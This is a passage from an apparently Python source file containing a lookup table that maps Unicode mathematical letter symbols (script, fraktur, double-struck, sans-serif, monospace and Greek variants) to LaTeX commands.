u"\uD43B":"\\mathsl{H}",
u"\uD43C":"\\mathsl{I}",
u"\uD43D":"\\mathsl{J}",
u"\uD43E":"\\mathsl{K}",
u"\uD43F":"\\mathsl{L}",
u"\uD440":"\\mathsl{M}",
u"\uD441":"\\mathsl{N}",
u"\uD442":"\\mathsl{O}",
u"\uD443":"\\mathsl{P}",
u"\uD444":"\\mathsl{Q}",
u"\uD445":"\\mathsl{R}",
u"\uD446":"\\mathsl{S}",
u"\uD447":"\\mathsl{T}",
u"\uD448":"\\mathsl{U}",
u"\uD449":"\\mathsl{V}",
u"\uD44A":"\\mathsl{W}",
u"\uD44B":"\\mathsl{X}",
u"\uD44C":"\\mathsl{Y}",
u"\uD44D":"\\mathsl{Z}",
u"\uD44E":"\\mathsl{a}",
u"\uD44F":"\\mathsl{b}",
u"\uD450":"\\mathsl{c}",
u"\uD451":"\\mathsl{d}",
u"\uD452":"\\mathsl{e}",
u"\uD453":"\\mathsl{f}",
u"\uD454":"\\mathsl{g}",
u"\uD456":"\\mathsl{i}",
u"\uD457":"\\mathsl{j}",
u"\uD458":"\\mathsl{k}",
u"\uD459":"\\mathsl{l}",
u"\uD45A":"\\mathsl{m}",
u"\uD45B":"\\mathsl{n}",
u"\uD45C":"\\mathsl{o}",
u"\uD45D":"\\mathsl{p}",
u"\uD45E":"\\mathsl{q}",
u"\uD45F":"\\mathsl{r}",
u"\uD460":"\\mathsl{s}",
u"\uD461":"\\mathsl{t}",
u"\uD462":"\\mathsl{u}",
u"\uD463":"\\mathsl{v}",
u"\uD464":"\\mathsl{w}",
u"\uD465":"\\mathsl{x}",
u"\uD466":"\\mathsl{y}",
u"\uD467":"\\mathsl{z}",
u"\uD468":"\\mathbit{A}",
u"\uD469":"\\mathbit{B}",
u"\uD46A":"\\mathbit{C}",
u"\uD46B":"\\mathbit{D}",
u"\uD46C":"\\mathbit{E}",
u"\uD46D":"\\mathbit{F}",
u"\uD46E":"\\mathbit{G}",
u"\uD46F":"\\mathbit{H}",
u"\uD470":"\\mathbit{I}",
u"\uD471":"\\mathbit{J}",
u"\uD472":"\\mathbit{K}",
u"\uD473":"\\mathbit{L}",
u"\uD474":"\\mathbit{M}",
u"\uD475":"\\mathbit{N}",
u"\uD476":"\\mathbit{O}",
u"\uD477":"\\mathbit{P}",
u"\uD478":"\\mathbit{Q}",
u"\uD479":"\\mathbit{R}",
u"\uD47A":"\\mathbit{S}",
u"\uD47B":"\\mathbit{T}",
u"\uD47C":"\\mathbit{U}",
u"\uD47D":"\\mathbit{V}",
u"\uD47E":"\\mathbit{W}",
u"\uD47F":"\\mathbit{X}",
u"\uD480":"\\mathbit{Y}",
u"\uD481":"\\mathbit{Z}",
u"\uD482":"\\mathbit{a}",
u"\uD483":"\\mathbit{b}",
u"\uD484":"\\mathbit{c}",
u"\uD485":"\\mathbit{d}",
u"\uD486":"\\mathbit{e}",
u"\uD487":"\\mathbit{f}",
u"\uD488":"\\mathbit{g}",
u"\uD489":"\\mathbit{h}",
u"\uD48A":"\\mathbit{i}",
u"\uD48B":"\\mathbit{j}",
u"\uD48C":"\\mathbit{k}",
u"\uD48D":"\\mathbit{l}",
u"\uD48E":"\\mathbit{m}",
u"\uD48F":"\\mathbit{n}",
u"\uD490":"\\mathbit{o}",
u"\uD491":"\\mathbit{p}",
u"\uD492":"\\mathbit{q}",
u"\uD493":"\\mathbit{r}",
u"\uD494":"\\mathbit{s}",
u"\uD495":"\\mathbit{t}",
u"\uD496":"\\mathbit{u}",
u"\uD497":"\\mathbit{v}",
u"\uD498":"\\mathbit{w}",
u"\uD499":"\\mathbit{x}",
u"\uD49A":"\\mathbit{y}",
u"\uD49B":"\\mathbit{z}",
u"\uD49C":"\\mathscr{A}",
u"\uD49E":"\\mathscr{C}",
u"\uD49F":"\\mathscr{D}",
u"\uD4A2":"\\mathscr{G}",
u"\uD4A5":"\\mathscr{J}",
u"\uD4A6":"\\mathscr{K}",
u"\uD4A9":"\\mathscr{N}",
u"\uD4AA":"\\mathscr{O}",
u"\uD4AB":"\\mathscr{P}",
u"\uD4AC":"\\mathscr{Q}",
u"\uD4AE":"\\mathscr{S}",
u"\uD4AF":"\\mathscr{T}",
u"\uD4B0":"\\mathscr{U}",
u"\uD4B1":"\\mathscr{V}",
u"\uD4B2":"\\mathscr{W}",
u"\uD4B3":"\\mathscr{X}",
u"\uD4B4":"\\mathscr{Y}",
u"\uD4B5":"\\mathscr{Z}",
u"\uD4B6":"\\mathscr{a}",
u"\uD4B7":"\\mathscr{b}",
u"\uD4B8":"\\mathscr{c}",
u"\uD4B9":"\\mathscr{d}",
u"\uD4BB":"\\mathscr{f}",
u"\uD4BD":"\\mathscr{h}",
u"\uD4BE":"\\mathscr{i}",
u"\uD4BF":"\\mathscr{j}",
u"\uD4C0":"\\mathscr{k}",
u"\uD4C1":"\\mathscr{l}",
u"\uD4C2":"\\mathscr{m}",
u"\uD4C3":"\\mathscr{n}",
u"\uD4C5":"\\mathscr{p}",
u"\uD4C6":"\\mathscr{q}",
u"\uD4C7":"\\mathscr{r}",
u"\uD4C8":"\\mathscr{s}",
u"\uD4C9":"\\mathscr{t}",
u"\uD4CA":"\\mathscr{u}",
u"\uD4CB":"\\mathscr{v}",
u"\uD4CC":"\\mathscr{w}",
u"\uD4CD":"\\mathscr{x}",
u"\uD4CE":"\\mathscr{y}",
u"\uD4CF":"\\mathscr{z}",
u"\uD4D0":"\\mathmit{A}",
u"\uD4D1":"\\mathmit{B}",
u"\uD4D2":"\\mathmit{C}",
u"\uD4D3":"\\mathmit{D}",
u"\uD4D4":"\\mathmit{E}",
u"\uD4D5":"\\mathmit{F}",
u"\uD4D6":"\\mathmit{G}",
u"\uD4D7":"\\mathmit{H}",
u"\uD4D8":"\\mathmit{I}",
u"\uD4D9":"\\mathmit{J}",
u"\uD4DA":"\\mathmit{K}",
u"\uD4DB":"\\mathmit{L}",
u"\uD4DC":"\\mathmit{M}",
u"\uD4DD":"\\mathmit{N}",
u"\uD4DE":"\\mathmit{O}",
u"\uD4DF":"\\mathmit{P}",
u"\uD4E0":"\\mathmit{Q}",
u"\uD4E1":"\\mathmit{R}",
u"\uD4E2":"\\mathmit{S}",
u"\uD4E3":"\\mathmit{T}",
u"\uD4E4":"\\mathmit{U}",
u"\uD4E5":"\\mathmit{V}",
u"\uD4E6":"\\mathmit{W}",
u"\uD4E7":"\\mathmit{X}",
u"\uD4E8":"\\mathmit{Y}",
u"\uD4E9":"\\mathmit{Z}",
u"\uD4EA":"\\mathmit{a}",
u"\uD4EB":"\\mathmit{b}",
u"\uD4EC":"\\mathmit{c}",
u"\uD4ED":"\\mathmit{d}",
u"\uD4EE":"\\mathmit{e}",
u"\uD4EF":"\\mathmit{f}",
u"\uD4F0":"\\mathmit{g}",
u"\uD4F1":"\\mathmit{h}",
u"\uD4F2":"\\mathmit{i}",
u"\uD4F3":"\\mathmit{j}",
u"\uD4F4":"\\mathmit{k}",
u"\uD4F5":"\\mathmit{l}",
u"\uD4F6":"\\mathmit{m}",
u"\uD4F7":"\\mathmit{n}",
u"\uD4F8":"\\mathmit{o}",
u"\uD4F9":"\\mathmit{p}",
u"\uD4FA":"\\mathmit{q}",
u"\uD4FB":"\\mathmit{r}",
u"\uD4FC":"\\mathmit{s}",
u"\uD4FD":"\\mathmit{t}",
u"\uD4FE":"\\mathmit{u}",
u"\uD4FF":"\\mathmit{v}",
u"\uD500":"\\mathmit{w}",
u"\uD501":"\\mathmit{x}",
u"\uD502":"\\mathmit{y}",
u"\uD503":"\\mathmit{z}",
u"\uD504":"\\mathfrak{A}",
u"\uD505":"\\mathfrak{B}",
u"\uD507":"\\mathfrak{D}",
u"\uD508":"\\mathfrak{E}",
u"\uD509":"\\mathfrak{F}",
u"\uD50A":"\\mathfrak{G}",
u"\uD50D":"\\mathfrak{J}",
u"\uD50E":"\\mathfrak{K}",
u"\uD50F":"\\mathfrak{L}",
u"\uD510":"\\mathfrak{M}",
u"\uD511":"\\mathfrak{N}",
u"\uD512":"\\mathfrak{O}",
u"\uD513":"\\mathfrak{P}",
u"\uD514":"\\mathfrak{Q}",
u"\uD516":"\\mathfrak{S}",
u"\uD517":"\\mathfrak{T}",
u"\uD518":"\\mathfrak{U}",
u"\uD519":"\\mathfrak{V}",
u"\uD51A":"\\mathfrak{W}",
u"\uD51B":"\\mathfrak{X}",
u"\uD51C":"\\mathfrak{Y}",
u"\uD51E":"\\mathfrak{a}",
u"\uD51F":"\\mathfrak{b}",
u"\uD520":"\\mathfrak{c}",
u"\uD521":"\\mathfrak{d}",
u"\uD522":"\\mathfrak{e}",
u"\uD523":"\\mathfrak{f}",
u"\uD524":"\\mathfrak{g}",
u"\uD525":"\\mathfrak{h}",
u"\uD526":"\\mathfrak{i}",
u"\uD527":"\\mathfrak{j}",
u"\uD528":"\\mathfrak{k}",
u"\uD529":"\\mathfrak{l}",
u"\uD52A":"\\mathfrak{m}",
u"\uD52B":"\\mathfrak{n}",
u"\uD52C":"\\mathfrak{o}",
u"\uD52D":"\\mathfrak{p}",
u"\uD52E":"\\mathfrak{q}",
u"\uD52F":"\\mathfrak{r}",
u"\uD530":"\\mathfrak{s}",
u"\uD531":"\\mathfrak{t}",
u"\uD532":"\\mathfrak{u}",
u"\uD533":"\\mathfrak{v}",
u"\uD534":"\\mathfrak{w}",
u"\uD535":"\\mathfrak{x}",
u"\uD536":"\\mathfrak{y}",
u"\uD537":"\\mathfrak{z}",
u"\uD538":"\\mathbb{A}",
u"\uD539":"\\mathbb{B}",
u"\uD53B":"\\mathbb{D}",
u"\uD53C":"\\mathbb{E}",
u"\uD53D":"\\mathbb{F}",
u"\uD53E":"\\mathbb{G}",
u"\uD540":"\\mathbb{I}",
u"\uD541":"\\mathbb{J}",
u"\uD542":"\\mathbb{K}",
u"\uD543":"\\mathbb{L}",
u"\uD544":"\\mathbb{M}",
u"\uD546":"\\mathbb{O}",
u"\uD54A":"\\mathbb{S}",
u"\uD54B":"\\mathbb{T}",
u"\uD54C":"\\mathbb{U}",
u"\uD54D":"\\mathbb{V}",
u"\uD54E":"\\mathbb{W}",
u"\uD54F":"\\mathbb{X}",
u"\uD550":"\\mathbb{Y}",
u"\uD552":"\\mathbb{a}",
u"\uD553":"\\mathbb{b}",
u"\uD554":"\\mathbb{c}",
u"\uD555":"\\mathbb{d}",
u"\uD556":"\\mathbb{e}",
u"\uD557":"\\mathbb{f}",
u"\uD558":"\\mathbb{g}",
u"\uD559":"\\mathbb{h}",
u"\uD55A":"\\mathbb{i}",
u"\uD55B":"\\mathbb{j}",
u"\uD55C":"\\mathbb{k}",
u"\uD55D":"\\mathbb{l}",
u"\uD55E":"\\mathbb{m}",
u"\uD55F":"\\mathbb{n}",
u"\uD560":"\\mathbb{o}",
u"\uD561":"\\mathbb{p}",
u"\uD562":"\\mathbb{q}",
u"\uD563":"\\mathbb{r}",
u"\uD564":"\\mathbb{s}",
u"\uD565":"\\mathbb{t}",
u"\uD566":"\\mathbb{u}",
u"\uD567":"\\mathbb{v}",
u"\uD568":"\\mathbb{w}",
u"\uD569":"\\mathbb{x}",
u"\uD56A":"\\mathbb{y}",
u"\uD56B":"\\mathbb{z}",
u"\uD56C":"\\mathslbb{A}",
u"\uD56D":"\\mathslbb{B}",
u"\uD56E":"\\mathslbb{C}",
u"\uD56F":"\\mathslbb{D}",
u"\uD570":"\\mathslbb{E}",
u"\uD571":"\\mathslbb{F}",
u"\uD572":"\\mathslbb{G}",
u"\uD573":"\\mathslbb{H}",
u"\uD574":"\\mathslbb{I}",
u"\uD575":"\\mathslbb{J}",
u"\uD576":"\\mathslbb{K}",
u"\uD577":"\\mathslbb{L}",
u"\uD578":"\\mathslbb{M}",
u"\uD579":"\\mathslbb{N}",
u"\uD57A":"\\mathslbb{O}",
u"\uD57B":"\\mathslbb{P}",
u"\uD57C":"\\mathslbb{Q}",
u"\uD57D":"\\mathslbb{R}",
u"\uD57E":"\\mathslbb{S}",
u"\uD57F":"\\mathslbb{T}",
u"\uD580":"\\mathslbb{U}",
u"\uD581":"\\mathslbb{V}",
u"\uD582":"\\mathslbb{W}",
u"\uD583":"\\mathslbb{X}",
u"\uD584":"\\mathslbb{Y}",
u"\uD585":"\\mathslbb{Z}",
u"\uD586":"\\mathslbb{a}",
u"\uD587":"\\mathslbb{b}",
u"\uD588":"\\mathslbb{c}",
u"\uD589":"\\mathslbb{d}",
u"\uD58A":"\\mathslbb{e}",
u"\uD58B":"\\mathslbb{f}",
u"\uD58C":"\\mathslbb{g}",
u"\uD58D":"\\mathslbb{h}",
u"\uD58E":"\\mathslbb{i}",
u"\uD58F":"\\mathslbb{j}",
u"\uD590":"\\mathslbb{k}",
u"\uD591":"\\mathslbb{l}",
u"\uD592":"\\mathslbb{m}",
u"\uD593":"\\mathslbb{n}",
u"\uD594":"\\mathslbb{o}",
u"\uD595":"\\mathslbb{p}",
u"\uD596":"\\mathslbb{q}",
u"\uD597":"\\mathslbb{r}",
u"\uD598":"\\mathslbb{s}",
u"\uD599":"\\mathslbb{t}",
u"\uD59A":"\\mathslbb{u}",
u"\uD59B":"\\mathslbb{v}",
u"\uD59C":"\\mathslbb{w}",
u"\uD59D":"\\mathslbb{x}",
u"\uD59E":"\\mathslbb{y}",
u"\uD59F":"\\mathslbb{z}",
u"\uD5A0":"\\mathsf{A}",
u"\uD5A1":"\\mathsf{B}",
u"\uD5A2":"\\mathsf{C}",
u"\uD5A3":"\\mathsf{D}",
u"\uD5A4":"\\mathsf{E}",
u"\uD5A5":"\\mathsf{F}",
u"\uD5A6":"\\mathsf{G}",
u"\uD5A7":"\\mathsf{H}",
u"\uD5A8":"\\mathsf{I}",
u"\uD5A9":"\\mathsf{J}",
u"\uD5AA":"\\mathsf{K}",
u"\uD5AB":"\\mathsf{L}",
u"\uD5AC":"\\mathsf{M}",
u"\uD5AD":"\\mathsf{N}",
u"\uD5AE":"\\mathsf{O}",
u"\uD5AF":"\\mathsf{P}",
u"\uD5B0":"\\mathsf{Q}",
u"\uD5B1":"\\mathsf{R}",
u"\uD5B2":"\\mathsf{S}",
u"\uD5B3":"\\mathsf{T}",
u"\uD5B4":"\\mathsf{U}",
u"\uD5B5":"\\mathsf{V}",
u"\uD5B6":"\\mathsf{W}",
u"\uD5B7":"\\mathsf{X}",
u"\uD5B8":"\\mathsf{Y}",
u"\uD5B9":"\\mathsf{Z}",
u"\uD5BA":"\\mathsf{a}",
u"\uD5BB":"\\mathsf{b}",
u"\uD5BC":"\\mathsf{c}",
u"\uD5BD":"\\mathsf{d}",
u"\uD5BE":"\\mathsf{e}",
u"\uD5BF":"\\mathsf{f}",
u"\uD5C0":"\\mathsf{g}",
u"\uD5C1":"\\mathsf{h}",
u"\uD5C2":"\\mathsf{i}",
u"\uD5C3":"\\mathsf{j}",
u"\uD5C4":"\\mathsf{k}",
u"\uD5C5":"\\mathsf{l}",
u"\uD5C6":"\\mathsf{m}",
u"\uD5C7":"\\mathsf{n}",
u"\uD5C8":"\\mathsf{o}",
u"\uD5C9":"\\mathsf{p}",
u"\uD5CA":"\\mathsf{q}",
u"\uD5CB":"\\mathsf{r}",
u"\uD5CC":"\\mathsf{s}",
u"\uD5CD":"\\mathsf{t}",
u"\uD5CE":"\\mathsf{u}",
u"\uD5CF":"\\mathsf{v}",
u"\uD5D0":"\\mathsf{w}",
u"\uD5D1":"\\mathsf{x}",
u"\uD5D2":"\\mathsf{y}",
u"\uD5D3":"\\mathsf{z}",
u"\uD5D4":"\\mathsfbf{A}",
u"\uD5D5":"\\mathsfbf{B}",
u"\uD5D6":"\\mathsfbf{C}",
u"\uD5D7":"\\mathsfbf{D}",
u"\uD5D8":"\\mathsfbf{E}",
u"\uD5D9":"\\mathsfbf{F}",
u"\uD5DA":"\\mathsfbf{G}",
u"\uD5DB":"\\mathsfbf{H}",
u"\uD5DC":"\\mathsfbf{I}",
u"\uD5DD":"\\mathsfbf{J}",
u"\uD5DE":"\\mathsfbf{K}",
u"\uD5DF":"\\mathsfbf{L}",
u"\uD5E0":"\\mathsfbf{M}",
u"\uD5E1":"\\mathsfbf{N}",
u"\uD5E2":"\\mathsfbf{O}",
u"\uD5E3":"\\mathsfbf{P}",
u"\uD5E4":"\\mathsfbf{Q}",
u"\uD5E5":"\\mathsfbf{R}",
u"\uD5E6":"\\mathsfbf{S}",
u"\uD5E7":"\\mathsfbf{T}",
u"\uD5E8":"\\mathsfbf{U}",
u"\uD5E9":"\\mathsfbf{V}",
u"\uD5EA":"\\mathsfbf{W}",
u"\uD5EB":"\\mathsfbf{X}",
u"\uD5EC":"\\mathsfbf{Y}",
u"\uD5ED":"\\mathsfbf{Z}",
u"\uD5EE":"\\mathsfbf{a}",
u"\uD5EF":"\\mathsfbf{b}",
u"\uD5F0":"\\mathsfbf{c}",
u"\uD5F1":"\\mathsfbf{d}",
u"\uD5F2":"\\mathsfbf{e}",
u"\uD5F3":"\\mathsfbf{f}",
u"\uD5F4":"\\mathsfbf{g}",
u"\uD5F5":"\\mathsfbf{h}",
u"\uD5F6":"\\mathsfbf{i}",
u"\uD5F7":"\\mathsfbf{j}",
u"\uD5F8":"\\mathsfbf{k}",
u"\uD5F9":"\\mathsfbf{l}",
u"\uD5FA":"\\mathsfbf{m}",
u"\uD5FB":"\\mathsfbf{n}",
u"\uD5FC":"\\mathsfbf{o}",
u"\uD5FD":"\\mathsfbf{p}",
u"\uD5FE":"\\mathsfbf{q}",
u"\uD5FF":"\\mathsfbf{r}",
u"\uD600":"\\mathsfbf{s}",
u"\uD601":"\\mathsfbf{t}",
u"\uD602":"\\mathsfbf{u}",
u"\uD603":"\\mathsfbf{v}",
u"\uD604":"\\mathsfbf{w}",
u"\uD605":"\\mathsfbf{x}",
u"\uD606":"\\mathsfbf{y}",
u"\uD607":"\\mathsfbf{z}",
u"\uD608":"\\mathsfsl{A}",
u"\uD609":"\\mathsfsl{B}",
u"\uD60A":"\\mathsfsl{C}",
u"\uD60B":"\\mathsfsl{D}",
u"\uD60C":"\\mathsfsl{E}",
u"\uD60D":"\\mathsfsl{F}",
u"\uD60E":"\\mathsfsl{G}",
u"\uD60F":"\\mathsfsl{H}",
u"\uD610":"\\mathsfsl{I}",
u"\uD611":"\\mathsfsl{J}",
u"\uD612":"\\mathsfsl{K}",
u"\uD613":"\\mathsfsl{L}",
u"\uD614":"\\mathsfsl{M}",
u"\uD615":"\\mathsfsl{N}",
u"\uD616":"\\mathsfsl{O}",
u"\uD617":"\\mathsfsl{P}",
u"\uD618":"\\mathsfsl{Q}",
u"\uD619":"\\mathsfsl{R}",
u"\uD61A":"\\mathsfsl{S}",
u"\uD61B":"\\mathsfsl{T}",
u"\uD61C":"\\mathsfsl{U}",
u"\uD61D":"\\mathsfsl{V}",
u"\uD61E":"\\mathsfsl{W}",
u"\uD61F":"\\mathsfsl{X}",
u"\uD620":"\\mathsfsl{Y}",
u"\uD621":"\\mathsfsl{Z}",
u"\uD622":"\\mathsfsl{a}",
u"\uD623":"\\mathsfsl{b}",
u"\uD624":"\\mathsfsl{c}",
u"\uD625":"\\mathsfsl{d}",
u"\uD626":"\\mathsfsl{e}",
u"\uD627":"\\mathsfsl{f}",
u"\uD628":"\\mathsfsl{g}",
u"\uD629":"\\mathsfsl{h}",
u"\uD62A":"\\mathsfsl{i}",
u"\uD62B":"\\mathsfsl{j}",
u"\uD62C":"\\mathsfsl{k}",
u"\uD62D":"\\mathsfsl{l}",
u"\uD62E":"\\mathsfsl{m}",
u"\uD62F":"\\mathsfsl{n}",
u"\uD630":"\\mathsfsl{o}",
u"\uD631":"\\mathsfsl{p}",
u"\uD632":"\\mathsfsl{q}",
u"\uD633":"\\mathsfsl{r}",
u"\uD634":"\\mathsfsl{s}",
u"\uD635":"\\mathsfsl{t}",
u"\uD636":"\\mathsfsl{u}",
u"\uD637":"\\mathsfsl{v}",
u"\uD638":"\\mathsfsl{w}",
u"\uD639":"\\mathsfsl{x}",
u"\uD63A":"\\mathsfsl{y}",
u"\uD63B":"\\mathsfsl{z}",
u"\uD63C":"\\mathsfbfsl{A}",
u"\uD63D":"\\mathsfbfsl{B}",
u"\uD63E":"\\mathsfbfsl{C}",
u"\uD63F":"\\mathsfbfsl{D}",
u"\uD640":"\\mathsfbfsl{E}",
u"\uD641":"\\mathsfbfsl{F}",
u"\uD642":"\\mathsfbfsl{G}",
u"\uD643":"\\mathsfbfsl{H}",
u"\uD644":"\\mathsfbfsl{I}",
u"\uD645":"\\mathsfbfsl{J}",
u"\uD646":"\\mathsfbfsl{K}",
u"\uD647":"\\mathsfbfsl{L}",
u"\uD648":"\\mathsfbfsl{M}",
u"\uD649":"\\mathsfbfsl{N}",
u"\uD64A":"\\mathsfbfsl{O}",
u"\uD64B":"\\mathsfbfsl{P}",
u"\uD64C":"\\mathsfbfsl{Q}",
u"\uD64D":"\\mathsfbfsl{R}",
u"\uD64E":"\\mathsfbfsl{S}",
u"\uD64F":"\\mathsfbfsl{T}",
u"\uD650":"\\mathsfbfsl{U}",
u"\uD651":"\\mathsfbfsl{V}",
u"\uD652":"\\mathsfbfsl{W}",
u"\uD653":"\\mathsfbfsl{X}",
u"\uD654":"\\mathsfbfsl{Y}",
u"\uD655":"\\mathsfbfsl{Z}",
u"\uD656":"\\mathsfbfsl{a}",
u"\uD657":"\\mathsfbfsl{b}",
u"\uD658":"\\mathsfbfsl{c}",
u"\uD659":"\\mathsfbfsl{d}",
u"\uD65A":"\\mathsfbfsl{e}",
u"\uD65B":"\\mathsfbfsl{f}",
u"\uD65C":"\\mathsfbfsl{g}",
u"\uD65D":"\\mathsfbfsl{h}",
u"\uD65E":"\\mathsfbfsl{i}",
u"\uD65F":"\\mathsfbfsl{j}",
u"\uD660":"\\mathsfbfsl{k}",
u"\uD661":"\\mathsfbfsl{l}",
u"\uD662":"\\mathsfbfsl{m}",
u"\uD663":"\\mathsfbfsl{n}",
u"\uD664":"\\mathsfbfsl{o}",
u"\uD665":"\\mathsfbfsl{p}",
u"\uD666":"\\mathsfbfsl{q}",
u"\uD667":"\\mathsfbfsl{r}",
u"\uD668":"\\mathsfbfsl{s}",
u"\uD669":"\\mathsfbfsl{t}",
u"\uD66A":"\\mathsfbfsl{u}",
u"\uD66B":"\\mathsfbfsl{v}",
u"\uD66C":"\\mathsfbfsl{w}",
u"\uD66D":"\\mathsfbfsl{x}",
u"\uD66E":"\\mathsfbfsl{y}",
u"\uD66F":"\\mathsfbfsl{z}",
u"\uD670":"\\mathtt{A}",
u"\uD671":"\\mathtt{B}",
u"\uD672":"\\mathtt{C}",
u"\uD673":"\\mathtt{D}",
u"\uD674":"\\mathtt{E}",
u"\uD675":"\\mathtt{F}",
u"\uD676":"\\mathtt{G}",
u"\uD677":"\\mathtt{H}",
u"\uD678":"\\mathtt{I}",
u"\uD679":"\\mathtt{J}",
u"\uD67A":"\\mathtt{K}",
u"\uD67B":"\\mathtt{L}",
u"\uD67C":"\\mathtt{M}",
u"\uD67D":"\\mathtt{N}",
u"\uD67E":"\\mathtt{O}",
u"\uD67F":"\\mathtt{P}",
u"\uD680":"\\mathtt{Q}",
u"\uD681":"\\mathtt{R}",
u"\uD682":"\\mathtt{S}",
u"\uD683":"\\mathtt{T}",
u"\uD684":"\\mathtt{U}",
u"\uD685":"\\mathtt{V}",
u"\uD686":"\\mathtt{W}",
u"\uD687":"\\mathtt{X}",
u"\uD688":"\\mathtt{Y}",
u"\uD689":"\\mathtt{Z}",
u"\uD68A":"\\mathtt{a}",
u"\uD68B":"\\mathtt{b}",
u"\uD68C":"\\mathtt{c}",
u"\uD68D":"\\mathtt{d}",
u"\uD68E":"\\mathtt{e}",
u"\uD68F":"\\mathtt{f}",
u"\uD690":"\\mathtt{g}",
u"\uD691":"\\mathtt{h}",
u"\uD692":"\\mathtt{i}",
u"\uD693":"\\mathtt{j}",
u"\uD694":"\\mathtt{k}",
u"\uD695":"\\mathtt{l}",
u"\uD696":"\\mathtt{m}",
u"\uD697":"\\mathtt{n}",
u"\uD698":"\\mathtt{o}",
u"\uD699":"\\mathtt{p}",
u"\uD69A":"\\mathtt{q}",
u"\uD69B":"\\mathtt{r}",
u"\uD69C":"\\mathtt{s}",
u"\uD69D":"\\mathtt{t}",
u"\uD69E":"\\mathtt{u}",
u"\uD69F":"\\mathtt{v}",
u"\uD6A0":"\\mathtt{w}",
u"\uD6A1":"\\mathtt{x}",
u"\uD6A2":"\\mathtt{y}",
u"\uD6A3":"\\mathtt{z}",
u"\uD6A8":"\\mathbf{\\Alpha}",
u"\uD6A9":"\\mathbf{\\Beta}",
u"\uD6AA":"\\mathbf{\\Gamma}",
u"\uD6AB":"\\mathbf{\\Delta}",
u"\uD6AC":"\\mathbf{\\Epsilon}",
u"\uD6AD":"\\mathbf{\\Zeta}",
u"\uD6AE":"\\mathbf{\\Eta}",
u"\uD6AF":"\\mathbf{\\Theta}",
u"\uD6B0":"\\mathbf{\\Iota}",
u"\uD6B1":"\\mathbf{\\Kappa}",
u"\uD6B2":"\\mathbf{\\Lambda}",
u"\uD6B5":"\\mathbf{\\Xi}",
u"\uD6B7":"\\mathbf{\\Pi}",
u"\uD6B8":"\\mathbf{\\Rho}",
u"\uD6B9":"\\mathbf{\\vartheta}",
u"\uD6BA":"\\mathbf{\\Sigma}",
u"\uD6BB":"\\mathbf{\\Tau}",
u"\uD6BC":"\\mathbf{\\Upsilon}",
u"\uD6BD":"\\mathbf{\\Phi}",
u"\uD6BE":"\\mathbf{\\Chi}",
u"\uD6BF":"\\mathbf{\\Psi}",
u"\uD6C0":"\\mathbf{\\Omega}",
u"\uD6C1":"\\mathbf{\\nabla}",
u"\uD6C2":"\\mathbf{\\Alpha}",
u"\uD6C3":"\\mathbf{\\Beta}",
u"\uD6C4":"\\mathbf{\\Gamma}",
u"\uD6C5":"\\mathbf{\\Delta}",
u"\uD6C6":"\\mathbf{\\Epsilon}",
u"\uD6C7":"\\mathbf{\\Zeta}",
u"\uD6C8":"\\mathbf{\\Eta}",
u"\uD6C9":"\\mathbf{\\theta}",
u"\uD6CA":"\\mathbf{\\Iota}",
u"\uD6CB":"\\mathbf{\\Kappa}",
u"\uD6CC":"\\mathbf{\\Lambda}",
u"\uD6CF":"\\mathbf{\\Xi}",
u"\uD6D1":"\\mathbf{\\Pi}",
u"\uD6D2":"\\mathbf{\\Rho}",
u"\uD6D3":"\\mathbf{\\varsigma}",
u"\uD6D4":"\\mathbf{\\Sigma}",
u"\uD6D5":"\\mathbf{\\Tau}",
u"\uD6D6":"\\mathbf{\\Upsilon}",
u"\uD6D7":"\\mathbf{\\Phi}",
u"\uD6D8":"\\mathbf{\\Chi}",
u"\uD6D9":"\\mathbf{\\Psi}",
u"\uD6DA":"\\mathbf{\\Omega}",
u"\uD6DB":"\\partial",
u"\uD6DC":"\\in",
u"\uD6DD":"\\mathbf{\\vartheta}",
u"\uD6DE":"\\mathbf{\\varkappa}",
u"\uD6DF":"\\mathbf{\\phi}",
u"\uD6E0":"\\mathbf{\\varrho}",
u"\uD6E1":"\\mathbf{\\varpi}",
u"\uD6E2":"\\mathsl{\\Alpha}",
u"\uD6E3":"\\mathsl{\\Beta}",
u"\uD6E4":"\\mathsl{\\Gamma}",
u"\uD6E5":"\\mathsl{\\Delta}",
u"\uD6E6":"\\mathsl{\\Epsilon}",
u"\uD6E7":"\\mathsl{\\Zeta}",
u"\uD6E8":"\\mathsl{\\Eta}",
u"\uD6E9":"\\mathsl{\\Theta}",
u"\uD6EA":"\\mathsl{\\Iota}",
u"\uD6EB":"\\mathsl{\\Kappa}",
u"\uD6EC":"\\mathsl{\\Lambda}",
u"\uD6EF":"\\mathsl{\\Xi}",
u"\uD6F1":"\\mathsl{\\Pi}",
u"\uD6F2":"\\mathsl{\\Rho}",
u"\uD6F3":"\\mathsl{\\vartheta}",
u"\uD6F4":"\\mathsl{\\Sigma}",
u"\uD6F5":"\\mathsl{\\Tau}",
u"\uD6F6":"\\mathsl{\\Upsilon}",
u"\uD6F7":"\\mathsl{\\Phi}",
u"\uD6F8":"\\mathsl{\\Chi}",
u"\uD6F9":"\\mathsl{\\Psi}",
u"\uD6FA":"\\mathsl{\\Omega}",
u"\uD6FB":"\\mathsl{\\nabla}",
u"\uD6FC":"\\mathsl{\\Alpha}",
u"\uD6FD":"\\mathsl{\\Beta}",
u"\uD6FE":"\\mathsl{\\Gamma}",
u"\uD6FF":"\\mathsl{\\Delta}",
u"\uD700":"\\mathsl{\\Epsilon}",
u"\uD701":"\\mathsl{\\Zeta}",
u"\uD702":"\\mathsl{\\Eta}",
u"\uD703":"\\mathsl{\\Theta}",
u"\uD704":"\\mathsl{\\Iota}",
u"\uD705":"\\mathsl{\\Kappa}",
u"\uD706":"\\mathsl{\\Lambda}",
u"\uD709":"\\mathsl{\\Xi}",
u"\uD70B":"\\mathsl{\\Pi}",
u"\uD70C":"\\mathsl{\\Rho}",
u"\uD70D":"\\mathsl{\\varsigma}",
u"\uD70E":"\\mathsl{\\Sigma}",
u"\uD70F":"\\mathsl{\\Tau}",
u"\uD710":"\\mathsl{\\Upsilon}",
u"\uD711":"\\mathsl{\\Phi}",
u"\uD712":"\\mathsl{\\Chi}",
u"\uD713":"\\mathsl{\\Psi}",
u"\uD714":"\\mathsl{\\Omega}",
u"\uD715":"\\partial",
u"\uD716":"\\in",
u"\uD717":"\\mathsl{\\vartheta}",
u"\uD718":"\\mathsl{\\varkappa}",
u"\uD719":"\\mathsl{\\phi}",
u"\uD71A":"\\mathsl{\\varrho}",
u"\uD71B":"\\mathsl{\\varpi}",
u"\uD71C":"\\mathbit{\\Alpha}",
u"\uD71D":"\\mathbit{\\Beta}",
u"\uD71E":"\\mathbit{\\Gamma}",
